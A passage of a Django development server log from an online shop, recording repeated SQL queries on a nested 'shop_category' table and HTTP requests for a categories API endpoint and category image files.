= 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-13 14:05:47,426 utils 20136 140506652825344 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 14:05:47,429 utils 20136 140506652825344 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-13 14:05:47,431 utils 20136 140506652825344 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-13 14:05:47,433 utils 20136 140506652825344 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-13 14:05:47,436 utils 20136 140506652825344 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-13 14:05:47,438 utils 20136 140506652825344 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 14:05:47,442 utils 20136 140506652825344 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-13 14:05:47,444 utils 20136 140506652825344 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-13 14:05:47,446 utils 20136 140506652825344 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-13 14:05:47,448 utils 20136 140506652825344 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-13 14:05:47,450 utils 20136 140506652825344 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-13 14:05:47,453 utils 20136 140506652825344 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 14:05:47,456 utils 20136 140506652825344 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-13 14:05:47,458 utils 20136 140506652825344 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-13 14:05:47,460 utils 20136 140506652825344 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-13 14:05:47,463 utils 20136 140506652825344 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-13 14:05:47,465 utils 20136 140506652825344 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [13/Dec/2019 14:05:47] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [13/Dec/2019 14:05:47] "GET /media/categories/2019/12/13/collection6_YoOFERO.png HTTP/1.0" 200 600645 [13/Dec/2019 14:05:47] "GET /media/categories/2019/12/13/collection6_4Q1Rpjs.png HTTP/1.0" 200 600645 [13/Dec/2019 14:05:47] "GET /media/categories/2019/12/13/collection6.png HTTP/1.0" 200 600645 [13/Dec/2019 14:05:47] "GET /media/categories/2019/12/13/collection3.png HTTP/1.0" 200 784410 [13/Dec/2019 14:05:47] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 200 387799 [13/Dec/2019 14:05:47] "GET /media/categories/2019/12/13/collection10.png HTTP/1.0" 200 387799 [13/Dec/2019 14:05:49] "GET /media/categories/2019/12/07/collection2.png HTTP/1.0" 200 466113 [13/Dec/2019 14:05:50] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 200 600645 [13/Dec/2019 14:05:50] "GET /media/categories/2019/12/13/collection3_3c60jfJ.png HTTP/1.0" 200 784410 [13/Dec/2019 14:05:50] "GET /media/categories/2019/12/13/popular3.png HTTP/1.0" 200 309908 [13/Dec/2019 14:05:50] "GET /media/categories/2019/12/13/collection4.png HTTP/1.0" 200 432480 [13/Dec/2019 14:05:50] "GET /media/categories/2019/12/13/collection3_blWHbYx.png HTTP/1.0" 200 784410 [13/Dec/2019 14:05:51] "GET /media/categories/2019/12/07/collection3.png HTTP/1.0" 200 784410 [13/Dec/2019 14:05:51] "GET /media/categories/2019/12/13/collection3_lEyiVWB.png HTTP/1.0" 200 784410 [13/Dec/2019 14:05:51] "GET /media/categories/2019/12/13/collection8_qT6o4Ze.png HTTP/1.0" 200 376652 [13/Dec/2019 14:05:52] "GET /media/categories/2019/12/13/collection4_klUHkrJ.png HTTP/1.0" 200 432480 [13/Dec/2019 14:05:52] "GET /media/categories/2019/12/07/collection7.png HTTP/1.0" 200 379075 [13/Dec/2019 14:05:52] "GET /media/categories/2019/12/13/weapons2.png HTTP/1.0" 200 523712 [13/Dec/2019 14:05:53] "GET /media/categories/2019/12/13/collection8_MKX5n4Y.png HTTP/1.0" 200 376652 [13/Dec/2019 14:05:53] "GET /media/categories/2019/12/13/collection4_ykrPiOh.png HTTP/1.0" 200 432480 [13/Dec/2019 14:05:53] "GET /media/categories/2019/12/13/collection8_98NdtQd.png HTTP/1.0" 200 376652 [13/Dec/2019 14:05:54] "GET /media/categories/2019/12/13/collection4_45IbUzs.png HTTP/1.0" 200 432480 [13/Dec/2019 14:05:54] "GET /media/categories/2019/12/13/collection7_s1gVgUK.png HTTP/1.0" 200 379075 [13/Dec/2019 14:05:54] "GET /media/categories/2019/12/13/collection8.png HTTP/1.0" 200 376652 [13/Dec/2019 14:05:54] "GET /media/categories/2019/12/13/collection9.png HTTP/1.0" 200 284188 [13/Dec/2019 14:05:55] "GET /media/categories/2019/12/13/collection5_NjJaGxE.png HTTP/1.0" 200 454674 [13/Dec/2019 14:05:55] "GET /media/categories/2019/12/13/collection5.png HTTP/1.0" 200 454674 [13/Dec/2019 14:05:55] "GET /media/categories/2019/12/13/collection5_J2Tl3z7.png HTTP/1.0" 200 454674 [13/Dec/2019 14:05:55] "GET /media/categories/2019/12/13/collection4_wmrC3xY.png HTTP/1.0" 200 432480 [13/Dec/2019 14:05:56] "GET /media/categories/2019/12/07/collection5.png HTTP/1.0" 200 454674 [13/Dec/2019 14:05:56] "GET /media/categories/2019/12/13/collection7_ZCM4YHI.png HTTP/1.0" 200 379075 [13/Dec/2019 14:05:56] "GET /media/categories/2019/12/13/collection7.png HTTP/1.0" 200 379075 [13/Dec/2019 14:05:57] "GET /media/categories/2019/12/13/collection5_DOY3fSw.png HTTP/1.0" 200 454674 [13/Dec/2019 14:05:57] "GET /media/categories/2019/12/13/collection7_zgKzb94.png HTTP/1.0" 200 379075 [13/Dec/2019 14:05:57] "GET /media/categories/2019/12/07/collection1.png HTTP/1.0" 200 793553 [13/Dec/2019 14:05:57] "GET /media/categories/2019/12/13/collection9_y5Aperx.png HTTP/1.0" 200 284188 [13/Dec/2019 14:05:57] "GET /media/categories/2019/12/13/weapons1.png HTTP/1.0" 200 700594 [13/Dec/2019 14:05:57] "GET /media/categories/2019/12/07/collection4.png HTTP/1.0" 200 432480 [13/Dec/2019 14:05:58] "GET /media/categories/2019/12/13/collection5_VsJvXmq.png HTTP/1.0" 200 454674 [13/Dec/2019 14:05:58] "GET /media/categories/2019/12/07/collection9.png HTTP/1.0" 200 284188 [13/Dec/2019 14:05:58] "GET /media/categories/2019/12/13/collection7_sU2pbFG.png HTTP/1.0" 200 379075 [13/Dec/2019 14:05:59] "GET /media/categories/2019/12/07/collection8.png HTTP/1.0" 200 376652 [13/Dec/2019 14:05:59] "GET /media/categories/2019/12/13/collection3_pKohXg6.png HTTP/1.0" 200 784410 [13/Dec/2019 14:05:59] "GET /media/categories/2019/12/13/collection3_rYale9k.png HTTP/1.0" 200 784410 [13/Dec/2019 14:05:59] "GET /media/categories/2019/12/13/collection3_O3U2Kj1.png HTTP/1.0" 200 784410 DEBUG 2019-12-13 14:06:41,093 utils 20136 140506667599616 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 14:06:41,099 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 14:06:41,102 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-13 14:06:41,105 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 14:06:41,108 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-13 14:06:41,110 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-13 14:06:41,112 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-13 14:06:41,114 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-13 14:06:41,116 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 14:06:41,120 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-13 14:06:41,122 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-13 14:06:41,128 utils 20136 140506667599616 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-13 14:06:41,130 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-13 14:06:41,133 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 14:06:41,137 utils 20136 140506432534272 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 6; args=(6,) DEBUG 2019-12-13 14:06:41,141 utils 20136 140506667599616 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-13 14:06:41,144 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 14:06:41,147 utils 20136 140506667599616 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-13 14:06:41,153 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) [13/Dec/2019 14:06:41] "GET /api/v1/categories/6 HTTP/1.0" 200 956 DEBUG 2019-12-13 14:06:41,157 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-13 14:06:41,161 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 14:06:41,166 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-13 14:06:41,168 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-13 14:06:41,171 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-13 14:06:41,174 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-13 14:06:41,176 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-13 14:06:41,179 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 14:06:41,183 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-13 14:06:41,187 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-13 14:06:41,191 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-13 14:06:41,194 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-13 14:06:41,197 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 14:06:41,201 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-13 14:06:41,204 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-13 14:06:41,207 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-13 14:06:41,210 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-13 14:06:41,213 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 14:06:41,217 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-13 14:06:41,220 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER 